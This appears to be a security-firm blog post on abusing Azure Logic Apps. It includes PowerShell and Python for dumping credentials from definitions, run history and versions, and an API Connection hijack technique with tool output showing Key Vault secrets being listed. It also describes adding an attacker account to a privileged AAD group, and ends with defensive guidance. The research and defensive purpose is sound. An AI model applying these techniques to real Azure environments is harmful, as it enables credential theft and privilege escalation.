Illogical Apps – Exploring and Exploiting Azure Logic Apps

When we’re doing Azure cloud penetration tests, every single one is different. Each environment is set up differently and uses different services in tandem with one another to achieve different goals. For that reason, we’re constantly looking for new ways to abuse different Azure services. In this blog post, I’ll talk about the work I’ve done with abusing Azure Logic Apps. I’ll walk through how to obtain sensitive information as a user with the Reader role and how to identify/abuse API Connection hijack scenarios as a Contributor.

What are Logic Apps?

In Azure, Logic Apps are similar to Microsoft’s “Power Automate” family, which my colleague Karl Fosaaen examined in his blog, Bypassing External Mail Forwarding Restrictions with Power Automate. A Logic App is a way to write low-code or no-code workflows for performing automated tasks.

Here’s an example workflow:

- Every day at 5:30PM

- Check the “reports” inbox for new emails

- If any emails have “HELLO” in the subject line

- Respond with “WORLD!”

In order to perform many useful actions, like accessing an email inbox, the Logic App will need to be authenticated to the attached service. There are a few ways to do this, and we’ll look at some potential abuse mechanisms for these connections.

As a Reader

Testing an Azure subscription with a Reader account is a fairly common scenario. A lot of abuse scenarios for the Reader role stem from finding credentials scattered throughout various Azure services, and Logic Apps are no different. Most Logic App actions accept input parameters, like a URL or a file name, and in some cases these inputs include authentication details. There are many different actions that can be used in a Logic App, but for this example we’ll look at the “HTTP Request” action.





Below is an HTTP Request action in the Logic App designer, with “Authentication” enabled. You can see there are several fields that may be interesting to an attacker. Once these fields are populated and saved, any Reader can dump them out of the Logic App definition.

As a tester, I wanted a generic way to dump these out automatically. This is pretty easy with a few lines of PowerShell.

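```powershell
# Assumes the Az.LogicApp module and an authenticated session (Connect-AzAccount)
$allLogicApps = Get-AzLogicApp

foreach ($app in $allLogicApps) {
    $appName = $app.Name.ToString()
    # App definition is returned as a Newtonsoft object, so convert it once
    # to a PowerShell object before walking it
    $rawDefinition = $app.Definition.ToString()
    $definition = $rawDefinition | ConvertFrom-Json
    Write-Output "=== $appName ===" $rawDefinition

    # Each action is a NoteProperty on "actions"; print every action's inputs
    $actions = $definition.actions
    if ($actions) {
        $noteProperties = Get-Member -InputObject $actions -MemberType NoteProperty
        foreach ($note in $noteProperties) {
            $noteName = $note.Name
            $inputs = $actions.$noteName.inputs
            Write-Output "[$noteName] inputs:" ($inputs | ConvertTo-Json -Depth 10)
        }
    }

    # Workflow-level parameters (default values can hold credentials)
    Write-Output "Parameters:" ($definition.parameters | ConvertTo-Json -Depth 10)
}
```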

The above snippet provides the raw definition of the Logic App, all of the inputs to any action, and any parameters provided to the Logic App. Looking at the inputs and parameters should help distill out most credentials and sensitive information but grepping through the raw definition will cover any corner cases. I’ve also added this to the Get-AzDomainInfo script in the MicroBurst toolkit. You can see the results below.
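If you would rather grep exported definitions offline, here is a minimal Python sketch of that “grep the raw definition” step. It assumes you have already saved a definition as JSON (for example, the output of `$app.Definition.ToString()`). The set of suspicious key names is my own illustrative assumption rather than an exhaustive list, and the sample definition is made up; its `authentication` block mirrors the Basic option of the HTTP action.

```python
import json
from typing import Any, Iterator, Tuple

# Illustrative, non-exhaustive key names that often carry credentials
SUSPECT_KEYS = {"authentication", "password", "secret", "clientsecret",
                "apikey", "authorization"}


def find_suspect_fields(node: Any, path: str = "$") -> Iterator[Tuple[str, Any]]:
    """Recursively yield (json_path, value) for keys that look credential-bearing."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key.lower() in SUSPECT_KEYS:
                yield child, value  # report the whole block, don't descend
            else:
                yield from find_suspect_fields(value, child)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from find_suspect_fields(item, f"{path}[{i}]")


# Made-up definition with Basic auth and a raw Authorization header
sample = json.loads("""
{
  "actions": {
    "HTTP": {
      "type": "Http",
      "inputs": {
        "method": "GET",
        "uri": "https://example.com/api",
        "authentication": {"type": "Basic", "username": "svc-user", "password": "Hunter2!"}
      }
    },
    "HTTP_2": {
      "type": "Http",
      "inputs": {
        "method": "POST",
        "uri": "https://example.com/other",
        "headers": {"Authorization": "Bearer abc123"}
      }
    }
  },
  "parameters": {}
}
""")

for json_path, value in find_suspect_fields(sample):
    print(json_path, "->", json.dumps(value))
```

Reporting the whole matched block, rather than recursing into it, keeps related fields (type, username, password) together in the output.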

With basic authentication or raw authentication headers, you may be able to gain access to an externally facing web application and escalate from there. Better yet, you may be able to use the OAuth secret to authenticate to Azure AD as a service principal, which may offer more severe privilege escalation opportunities.
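An OAuth block is valuable because its tenant, client ID, and secret are exactly the inputs the OAuth 2.0 client credentials grant expects. The Python sketch below only builds the token request for the Microsoft identity platform v2.0 token endpoint and does not send it. The tenant, client ID, and secret are placeholders, and targeting the Azure Resource Manager scope is my assumption about what you would want to reach.

```python
from urllib.request import Request
from urllib.parse import urlencode


def build_token_request(tenant: str, client_id: str, client_secret: str,
                        scope: str = "https://management.azure.com/.default") -> Request:
    """Build (but do not send) a client-credentials token request."""
    url = f"https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token"
    body = urlencode({
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": client_secret,
        "scope": scope,
    }).encode()
    return Request(url, data=body, method="POST",
                   headers={"Content-Type": "application/x-www-form-urlencoded"})


# Placeholder values, as if lifted from a Logic App's OAuth authentication block
req = build_token_request("contoso.onmicrosoft.com",
                          "00000000-0000-0000-0000-000000000000", "s3cr3t")
print(req.full_url)
# Passing req to urllib.request.urlopen would send it; a successful response
# is JSON that includes an access_token for the requested scope.
```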

Other things to look out for as a Reader are the “Run History” and “Versions” tabs.







The Run History tab contains a history of all previous runs of the Logic App. This includes the definition of the Logic App and any inputs/outputs to actions. In my experience, there is a tendency to leak sensitive information here. For example, below is a screenshot of the Run History entry for a Logic App that dumps all secrets from a Key Vault.

While dumping all secrets is unrealistic, a Logic App fetching a secret that is then used to access another service is fairly common. After all, Key Vaults are (theoretically) where secrets should be fetched from. By default, all actions will display their output in Run History, including sensitive actions like getting secrets from a Key Vault. Some actions that seem interesting are actually benign (fetching a file from SharePoint, for example, doesn’t just leak the raw file), but others can be a gold mine.

The Versions tab contains a history of all previous definitions for the Logic App. This can be especially useful for an attacker since there is no way to remove a version from here. A common phenomenon across any sort of development life cycle is that an application will initially have hardcoded credentials, which are later removed for one reason or another. In this case, we can simply go back to the start of the Logic App versions and start looking for removed secrets.

It’s worth noting that this is largely the same information as the Run History tab and is actually less useful because it does not contain inputs/outputs obtained at runtime, but it does include versions that were never run. So, if a developer committed secrets in a Logic App and then removed them without running the Logic App, we can find that definition in the Versions tab.
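Old versions can’t be deleted, so diffing them against the current definition is a quick way to spot removed secrets. This is a minimal Python sketch that assumes you have already exported each version’s definition as a dict, ordered oldest first. It collects every string value from the older versions and reports the ones missing from the latest version. The two sample versions are made up.

```python
from typing import Any, List, Set


def string_leaves(node: Any) -> Set[str]:
    """Collect every string value (not key) in a JSON-like structure."""
    if isinstance(node, str):
        return {node}
    if isinstance(node, dict):
        node = list(node.values())
    if isinstance(node, list):
        leaves: Set[str] = set()
        for item in node:
            leaves |= string_leaves(item)
        return leaves
    return set()  # numbers, booleans, null


def removed_strings(versions: List[dict]) -> Set[str]:
    """Strings that appear in some older version but not in the latest one."""
    *older, latest = versions
    current = string_leaves(latest)
    seen: Set[str] = set()
    for definition in older:
        seen |= string_leaves(definition)
    return seen - current


# Made-up history: a hardcoded password later swapped for a parameter
v1 = {"actions": {"HTTP": {"inputs": {"uri": "https://example.com",
      "authentication": {"type": "Basic", "username": "svc", "password": "OldP@ss"}}}}}
v2 = {"actions": {"HTTP": {"inputs": {"uri": "https://example.com",
      "authentication": {"type": "Raw", "value": "@parameters('token')"}}}}}
print(sorted(removed_strings([v1, v2])))
```

The output is noisy by design. Harmless values such as `Basic` show up alongside the password, so treat it as a shortlist to review by hand.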

I’ve added a small function, Get-AzLogicAppUnusedVersions, to MicroBurst which will take a target Logic App and identify any versions that were created but not used in a run. This may help to identify which versions you can find in the Run History tab, and which are only in the Versions tab.
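The core idea behind finding unused versions is a set difference: take all version IDs and remove every version that at least one run actually executed. This Python sketch is not MicroBurst’s implementation. It assumes you have already pulled the version IDs and, for each run, the version that run executed, stored under a hypothetical `workflow_version` key.

```python
from typing import Dict, Iterable, List


def unused_versions(version_ids: Iterable[str], runs: Iterable[Dict[str, str]]) -> List[str]:
    """Return version IDs (in their original order) that no run references."""
    used = {run["workflow_version"] for run in runs}  # hypothetical field name
    return [v for v in version_ids if v not in used]


versions = ["v001", "v002", "v003", "v004"]
runs = [{"run_id": "r1", "workflow_version": "v001"},
        {"run_id": "r2", "workflow_version": "v004"},
        {"run_id": "r3", "workflow_version": "v004"}]
print(unused_versions(versions, runs))  # -> ['v002', 'v003']
```

Versions returned here exist only in the Versions tab, so they are the ones you won’t find by browsing Run History.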


Testing Azure with Contributor Rights

As with all things Azure, if you have Contributor rights, then things become more interesting.

Another way to provide Logic Apps with authentication is by using API Connections. Each API Connection pertains to a certain Azure service, such as Blob Storage or Key Vault, or to a third-party service like SendGrid. In certain cases, we can reuse these API Connections to tease out some, perhaps unintended, functionality. For example, a legitimate user might create an API Connection to a Key Vault so that their Logic App can fetch a secret used to access another service. However, if we create our own Logic App with that same connection, then we can perform related actions, like listing every secret in the vault, in the context of the user who created the API Connection.

Here’s how the scenario that I described above would work.

- An administrator creates the Encrypt-My-Data-Logic-App and gives it an API connection to the Totally-Secure-Key-Vault

- A Logic App Contributor creates a new Logic App with that API connection

- The new Logic App will list all secrets in the Key Vault and dump them out

- The attacker fetches the dumped secrets from the Logic App output and then deletes the app

To be clear, this isn’t really breaking the Azure or Logic Apps permissions model. When the API Connection is created, it is granted access to an explicit resource. But it’s very possible that a user will grant access to a resource without knowing that they are exposing additional functionality to other Contributors. At least from what I have seen, it is not made evident to users that API Connections can be reused in this manner.



For the example above, you may be saying “So what, a Contributor can just dump the passwords anyways.” You would be correct, but to perform this attack you only need two permissions: Microsoft.Web/connections/* and Microsoft.Logic/*. This can come into play for custom roles, users with the Logic App Contributor role, or users with Contributor scoped to a Resource Group.

For example, an attacker has Contributor over the “DevEnvironment” Resource Group. For one reason or another, an administrator creates an API Connection to the “ProdPasswords” Key Vault. The ProdPasswords vault is in the “ProdEnvironment” Resource Group, but the API Connection is in the DevEnvironment RG. Since the attacker has Contributor over the API Connection, they can create a new Logic App with this API Connection and dump the ProdPasswords vault. This scenario is a bit contrived, but in essence you may be able to access resources that you normally could not.
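To check whether a given role carries what this attack needs, you can approximate how Azure RBAC matches wildcards. This minimal Python sketch rests on a few assumptions. Matching is case-insensitive, `*` matches any run of characters, and an operation is allowed if it matches some `Actions` entry and no `NotActions` entry. It ignores deny assignments and scope. The two operations in `NEEDED` are my representative picks from `Microsoft.Web/connections/*` and `Microsoft.Logic/*`, and both role shapes are hypothetical and abbreviated.

```python
from fnmatch import fnmatchcase
from typing import Iterable

# Representative operations: read the connection, write a new workflow
NEEDED = ["Microsoft.Web/connections/read", "Microsoft.Logic/workflows/write"]


def _matches(pattern: str, operation: str) -> bool:
    # Case-insensitive; fnmatch's "*" matches any run of characters, including "/"
    return fnmatchcase(operation.lower(), pattern.lower())


def grants(actions: Iterable[str], not_actions: Iterable[str], operation: str) -> bool:
    """Approximate check: allowed by some Actions entry and by no NotActions entry."""
    allowed = any(_matches(p, operation) for p in actions)
    excluded = any(_matches(p, operation) for p in not_actions)
    return allowed and not excluded


def can_hijack(role: dict) -> bool:
    return all(grants(role["actions"], role["not_actions"], op) for op in NEEDED)


# Hypothetical, abbreviated role shapes for illustration only
logic_app_style = {"actions": ["Microsoft.Logic/*", "Microsoft.Web/connections/*"],
                   "not_actions": []}
no_connections = {"actions": ["*"],
                  "not_actions": ["Microsoft.Authorization/*/Write",
                                  "Microsoft.Authorization/*/Delete",
                                  "Microsoft.Web/connections/*"]}

print("logic_app_style:", can_hijack(logic_app_style))  # True
print("no_connections:", can_hijack(no_connections))    # False
```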



For other types of connections, the possibilities for abuse become less RBAC-specific. Let’s say there’s a connection to Azure Active Directory (AAD) for listing out the members of an AD group. Maybe the creator of the connection wants to check an email to see if the sender is a member of the “C-SUITE VERY IMPORTANT” group and mark the email as high priority. Assuming this user has AAD privileges, we could hijack this API Connection to add a new user to AAD. Unfortunately, we can’t assign any Azure subscription RBAC permissions since there is no Logic App action for this, but it could be useful for establishing persistence.

Situationally, if the subscription in question has an Azure Role Assignment for an AAD group, then this does enable us to add our account (or our newly created user) to that group. For example, if the “Security Team” AAD group has Owner rights on a subscription, you can add your account to the “Security Team” group and you are now an Owner.

- The Administrator user creates and authorizes the User-Lookup-Logic-App

- An attacker with Contributor creates a new Logic App with this connection

- The new Logic App adds the “attacker” user to Azure AD and adds it to the “Security Team” group

- The attacker deletes the Logic App

- The attacker authenticates to AAD with the newly added account, which now has Owner rights on the subscription from the “Security Team” group

Ryan Hausknecht (@haus3c) discussed the above scenario in a blog about PowerZure. He mentions that he chose not to implement this in PowerZure due to the sheer number of potential actions; there is no silver bullet abuse technique. However, I wanted a way to make this as plug-and-play as possible.

API Hijacking in Practice

Here is a high-level overview of programmatically hijacking an API Connection.

- In your own Azure tenant, create a Logic App (LA) replicating the functionality that you want to achieve and place the definition into a file. (This step is manual)

- Get the details of the target API Connection

- Plug the connection details and the manually created definition into a generic LA template

- Create a new LA with your malicious definition

- Retrieve the callback URL for the LA and trigger it to run

- Retrieve any output or errors

- Delete the LA
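Step three is mostly JSON plumbing. This is a minimal Python sketch that assumes the usual shape for Logic Apps with managed API connections. The definition declares a `$connections` parameter, and the workflow’s parameter values map a connection key to the target connection’s resource ID and the managed API’s ID. Actions then reference it with `@parameters('$connections')['keyvault']['connectionId']`. `build_workflow_properties` is a hypothetical helper, not part of any SDK, and all IDs below are placeholders.

```python
import copy
import json


def build_workflow_properties(definition: dict, conn_key: str, connection_id: str,
                              connection_name: str, managed_api_id: str) -> dict:
    """Wire an existing API Connection into a Logic App definition via $connections."""
    definition = copy.deepcopy(definition)  # don't mutate the caller's template
    definition.setdefault("parameters", {})["$connections"] = {
        "defaultValue": {}, "type": "Object"}
    return {
        "definition": definition,
        "parameters": {"$connections": {"value": {conn_key: {
            "connectionId": connection_id,
            "connectionName": connection_name,
            "id": managed_api_id,
        }}}},
        "state": "Enabled",
    }


SUB = "00000000-0000-0000-0000-000000000000"  # placeholder subscription ID
payload = {
    "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#",
    "contentVersion": "1.0.0.0",
    "triggers": {"manual": {"type": "Request", "kind": "Http", "inputs": {"schema": {}}}},
    "actions": {},  # the manually built malicious actions would go here
    "outputs": {},
}
props = build_workflow_properties(
    payload, "keyvault",
    f"/subscriptions/{SUB}/resourceGroups/DevEnvironment/providers/Microsoft.Web/connections/keyvault",
    "keyvault",
    f"/subscriptions/{SUB}/providers/Microsoft.Web/locations/eastus/managedApis/keyvault",
)
print(json.dumps(props["parameters"], indent=2))
```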

Since this is a scenario-specific attack, I’d like to walk through an example. I’ll show how to create a definition to exploit the Key Vault connection as I described earlier. I’ve published the contents which result from following these steps, so you can skip this if you’d prefer to just use the existing tooling.

First, you’ll need to have a Key Vault set up. Put at least one secret and one key in there, so that you have targets for testing.

You’ll want to create a Logic App definition that looks as follows.

If you run this, it should list out the secrets from the Key Vault which you can view within the portal. However, if we want to fetch the results via PowerShell, we’ll need to take one more step.

Select the “Logic app code view” window. Right now, the “outputs” object should be empty. Change it to the following, where “secrets_array” is the name of the variable you used earlier.

```json
"outputs": {
    "result": {
        "type": "Array",
        "value": "@variables('secrets_array')"
    }
}
```

Now you can get the output of that workflow from the command line as follows:

```powershell
$history = (Get-AzLogicAppRunHistory -ResourceGroupName "main_rg" -Name "hijackable")[0]
$history.Outputs.result.Value.ToString()
```

You can see this in action in the example below.

Automation!

So, above is how you would create the Logic App within your own tenant. Automating the process of deploying this definition into the target subscription is as simple as replacing some strings in a template and then calling the standard Az PowerShell functions. I’ve rolled all of this into a MicroBurst script, Invoke-APIConnectionHijack, which is ultimately a wrapper around the Az PowerShell module. Its main job is automating away some of the formatting nonsense that I had to fight with when doing this manually. I’ve also placed the above Key Vault dumping script here, which can be used as a template for future development.

The script does the following:

- Fetches the details of a target connection

- Fetches the new Logic App definition

- Formats the above information to work with the Az PowerShell module

- Creates a new Logic App using the updated template

- Runs the new Logic App, waits until it completes, fetches the output, and then deletes the Logic App
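The “waits until it completes” step is a plain polling loop. This is a Python sketch that assumes a caller-supplied `get_status` callable, which is hypothetical. In practice it would wrap whatever you use to read the latest run’s status. The sketch treats `Running` and `Waiting` as the only non-terminal states, and that assumption is worth checking against the run statuses you actually see.

```python
import time
from typing import Callable

PENDING = {"Running", "Waiting"}  # assumed non-terminal run statuses


def wait_for_run(get_status: Callable[[], str], timeout: float = 300.0,
                 interval: float = 5.0,
                 sleep: Callable[[float], None] = time.sleep) -> str:
    """Poll until the run leaves a pending state; return the final status."""
    deadline = time.monotonic() + timeout
    while True:
        status = get_status()
        if status not in PENDING:
            return status
        if time.monotonic() >= deadline:
            raise TimeoutError(f"run still {status!r} after {timeout} seconds")
        sleep(interval)


# Usage with a fake status source: two pending polls, then success
statuses = iter(["Running", "Waiting", "Succeeded"])
print(wait_for_run(lambda: next(statuses), sleep=lambda _: None))  # -> Succeeded
```

Injecting `sleep` keeps the loop testable without real delays. The timeout ensures that a stuck run doesn’t block cleanup of the temporary Logic App forever.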



To validate that this works, I’ve got a user with just the Logic App Contributor role in my subscription, so this user cannot read the Key Vault’s contents directly.

I’ve also changed the normal Logic App definition to a workflow that just runs “Encrypt data with key”, to represent a somewhat normal abuse scenario. And then…

```text
PS C:\Tools\microburst\Misc\LogicApps> Get-AzKeyVault
PS C:\Tools\microburst\Misc\LogicApps> Invoke-APIConnectorHijack -connectionName "keyvault" -definitionPath .\logic-app-keyvault-dump-payload.json -logicAppRg "Logic-App-Template"
Creating the HrjFDGvgXyxdtWo logic app...
Created the new logic app...
Called the manual trigger endpoint...
Output from Logic App run:
[
  {
    "value": "test-secret-value",
    "name": "test-secret",
    "version": "c1a95beef1e640a0af844761e1a842cf",
    "contentType": null,
    "isEnabled": true,
    "createdTime": "2021-07-07T19:24:06Z",
    "lastUpdatedTime": "2021-07-07T19:24:06Z",
    "validityStartTime": null,
    "validityEndTime": null
  }
]
Successfully cleaned up Logic App
```

And there you have it! A successful API Connection hijack.

Detection/Defenses for your Azure Environment

Generally, one of the best hardening measures for any Azure environment is having a good grip on who has what rights, and where they are applied. The Contributor role will continue to provide plenty of opportunities for privilege escalation, but this is a good reminder that even service-specific roles like Logic App Contributor should be treated with caution. These roles can provide unintended access to other connected services. Users should always be provided with the most granular, least privileged access wherever possible. This is much easier said than done, but this is the best way to make my life as an attacker more frustrating.

To defend against the leakage of secrets in Logic App definitions, you can fetch the secrets at run time using a Key Vault API Connection. I know this seems a bit counterintuitive given the subject of this blog, but it will prevent Readers from obtaining cleartext credentials from the definition.

To prevent the leakage of secrets in the inputs/outputs to actions in the Run History tab, you can enable the “Secure Input/Output” setting for any given action. This will prevent the input/output to the action from showing up in that run’s results. You can see this below.
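In code view, the Secure Inputs/Outputs toggles correspond to a `runtimeConfiguration.secureData.properties` list on each action. This minimal Python sketch turns both on for every top-level action in an exported definition. It does not descend into actions nested inside scopes, conditions, or loops, which real workflows would also need.

```python
import copy


def secure_all_actions(definition: dict) -> dict:
    """Return a copy with secure inputs/outputs enabled on every top-level action."""
    hardened = copy.deepcopy(definition)
    for action in hardened.get("actions", {}).values():
        secure = (action.setdefault("runtimeConfiguration", {})
                        .setdefault("secureData", {}))
        secure["properties"] = ["inputs", "outputs"]
    return hardened


definition = {"actions": {"Get_secret": {"type": "ApiConnection", "inputs": {}}}}
print(secure_all_actions(definition)["actions"]["Get_secret"]["runtimeConfiguration"])
# -> {'secureData': {'properties': ['inputs', 'outputs']}}
```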

Unfortunately, there isn’t a switch to flip for preventing the abuse of API Connections.

I often find it helpful to think of Azure permissions relationships using the same graph logic as BloodHound (and its Azure ingestor, AzureHound). When we create an API Connection, we are also creating a link to every Contributor or Logic App Contributor in the subscription. This is how it would look in a graph.

In essence, when we create an API Connection with write permissions to AAD, then we are transitively giving all Contributors that permission.
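The transitive relationship can be made concrete with a tiny directed graph in the BloodHound spirit. Principals point at resources they can control, and an API Connection points at whatever it is authorized to act on. The node and edge names below are hypothetical, loosely following the earlier Key Vault and “Security Team” examples. A breadth-first search lists everything reachable from a principal.

```python
from collections import deque
from typing import Dict, List, Set

# Hypothetical edges: "X -> Y" means X can act on, or through, Y
EDGES: Dict[str, List[str]] = {
    "user:LogicAppContributor": ["conn:aad-connection", "conn:keyvault"],
    "conn:aad-connection": ["group:Security Team"],
    "conn:keyvault": ["vault:ProdPasswords"],
    "group:Security Team": ["role:Owner on subscription"],
}


def reachable(start: str, edges: Dict[str, List[str]]) -> Set[str]:
    """Breadth-first search returning every node reachable from start."""
    seen: Set[str] = set()
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nxt in edges.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


print(sorted(reachable("user:LogicAppContributor", EDGES)))
```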

In my opinion, the best way to prevent API Connection abuse is to know that any API Connection you create can be used by any Contributor on the subscription. By acknowledging this, we have a justification to start assigning users more granular permissions. Two examples of this may look like:

- A custom role that provides users with almost normal Contributor rights, but without the Microsoft.Web/connections/* permission.

- Assigning Contributor at the Resource Group level rather than on the whole subscription.

Conclusion

While the attack surface offered by Logic Apps is specific to each environment, hopefully you find this general guidance useful while evaluating your Logic Apps. To provide a brief recap:

- Readers can read out any sensitive inputs (JWTs, OAuth details) or outputs (Key Vault secrets, results from HTTP request) from current/previous versions and previous runs

- Defenders can partially prevent this by using secure inputs/outputs in their Logic App definitions

- Contributors can create a new Logic App to perform any actions associated with a given API Connection

- Defenders must be aware of who has Contributor rights to sensitive API Connections

Work with NetSPI on your next Azure cloud penetration test or application penetration testing. Contact us: www.netspi.com/contact-us.
